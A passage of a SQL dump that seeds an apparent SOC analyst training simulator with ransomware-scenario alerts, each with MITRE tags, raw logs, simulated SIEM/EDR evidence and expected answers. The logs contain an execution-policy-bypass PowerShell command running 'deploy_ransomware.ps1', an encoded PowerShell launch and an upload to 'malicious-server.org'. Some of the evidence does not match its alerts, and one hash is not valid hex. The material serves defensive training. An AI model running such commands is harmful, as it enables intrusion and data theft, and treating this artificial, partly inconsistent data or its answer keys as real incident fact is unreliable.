detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(960, 'Suspicious Remote Access Attempt Detected', 'high', 'Intrusion Detection System (IDS) Logs', 'An unauthorized access attempt was detected from an external IP leveraging a known vulnerability in Baltimore\'s remote access tool. The attacker tried to exploit the system using a tool associated with beginner-level cyber operations.', 'Initial Access', 'T1078.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:06Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin\",\"tool\":\"RemoteAccessTool_vulnerable\",\"attempt_result\":\"failed\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Unauthorized Access Attempt\",\"message\":\"Failed login attempt detected from external source using a known exploit.\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a server within the Baltimore network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Policy\",\"verdict\":\"suspicious\",\"details\":\"Default username often targeted in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(961, 'Malicious Script Execution Detected', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following successful access, a malicious script was executed to deploy the ransomware, initiating the attack on the city\'s infrastructure. The script was executed on a compromised endpoint.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:13Z\",\"event_id\":\"EDR-456789\",\"hostname\":\"city-infra-server01\",\"username\":\"compromised_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\deploy_ransomware.ps1\",\"file_hash\":\"3f2e5f7b9e2a3c4d5f6a7b8c9d0e1f2g3h4i5j6k\",\"source_ip\":\"203.0.113.56\",\"destination_ip\":\"10.0.0.25\",\"file_name\":\"deploy_ransomware.ps1\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known ransomware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2e5f7b9e2a3c4d5f6a7b8c9d0e1f2g3h4i5j6k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deploy_ransomware.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Filename used in multiple ransomware attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(962, 'Unauthorized Account Creation Observed', 'high', 'User Account Management Logs', 'New accounts with administrative privileges were created to ensure the attacker retains control, even if the initial access points are discovered.', 'Persistence', 'T1136.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"event_source\":\"Microsoft-Windows-Security-Auditing\",\"account_name\":\"admin_user\",\"account_domain\":\"CITY_NETWORK\",\"logon_type\":\"3\",\"source_ip\":\"203.0.113.45\",\"target_sid\":\"S-1-5-21-3456789012-3456789012-3456789012-1001\",\"target_username\":\"new_admin_account\",\"privilege_level\":\"Administrator\",\"internal_ip\":\"10.0.0.15\",\"associated_files\":[{\"filename\":\"malicious_script.ps1\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}]}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"new_admin_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Unexpected administrative account creation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash linked to potentially harmful scripts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.649Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_source\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"account_name\\\":\\\"admin_user\\\",\\\"account_domain\\\":\\\"CITY_NETWORK\\\",\\\"logon_type\\\":\\\"3\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_sid\\\":\\\"S-1-5-21-3456789012-3456789012-3456789012-1001\\\",\\\"target_username\\\":\\\"new_admin_account\\\",\\\"privilege_level\\\":\\\"Administrator\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"malicious_script.ps1\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(963, 'Anomalous Lateral Movement Activity', 'high', 'Network Traffic Analysis', 'The attacker used compromised credentials to move across various systems, spreading the ransomware deeper into the city\'s network infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.2.15\",\"external_attack_ip\":\"203.0.113.25\",\"username\":\"jdoe\",\"compromised_account\":true,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"ransomware_payload.exe\",\"protocol\":\"SMB\",\"action\":\"Login successful\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for unusual activity\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File known to be used in ransomware attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(964, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) Solutions', 'An unauthorized attempt to exfiltrate sensitive data was detected, potentially for ransom leverage. The attacker used an external IP to upload confidential files to a remote server.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"file_name\":\"financial_report_q3_2023.docx\",\"file_hash\":\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\",\"action\":\"attempted_upload\",\"destination_url\":\"http://malicious-server.org/upload\",\"protocol\":\"HTTP\",\"alert_level\":\"high\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial data.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"suspicious\",\"details\":\"Hash not seen in common repositories, linked to exfiltration attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.651Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231005-001\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.76\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.docx\\\",\\\"file_hash\\\":\\\"3d5c3b2a5f2e4f1b9b3c12e8a8d9f8e7\\\",\\\"action\\\":\\\"attempted_upload\\\",\\\"destination_url\\\":\\\"http://malicious-server.org/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"alert_level\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
